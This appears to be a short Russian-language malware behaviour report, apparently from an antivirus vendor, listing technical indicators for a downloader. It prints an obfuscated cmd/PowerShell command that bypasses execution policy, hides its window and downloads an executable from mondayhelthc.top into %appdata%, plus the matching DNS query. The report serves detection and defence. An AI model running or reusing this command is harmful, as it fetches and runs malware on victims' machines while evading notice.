Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^eRshELl^.^E^X^e -E^X^ECuTI^On^p^O^l^iC^Y ^B^YpaSs^ -NOPRo^fIL^e ^-^wIN^DOW^S^TYl^e ^h^iDde^n (ne^W^-object S^YST^E^m^.NeT.W^eBCliEnt)^.^DOWnlO^ADFile('http://monda...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "Pow^eRshELl^.^E^X^e -E^X^ECuTI^On^p^O^l^iC^Y ^B^YpaSs^ -NOPRo^fIL^e ^-^wIN^DOW^S^TYl^e ^h^iDde^n (ne^W^-object S^YST^E^m^.NeT.W^eBCliEnt)^.^DOWnlO^ADFile('http://monda...' (со скрытым окном)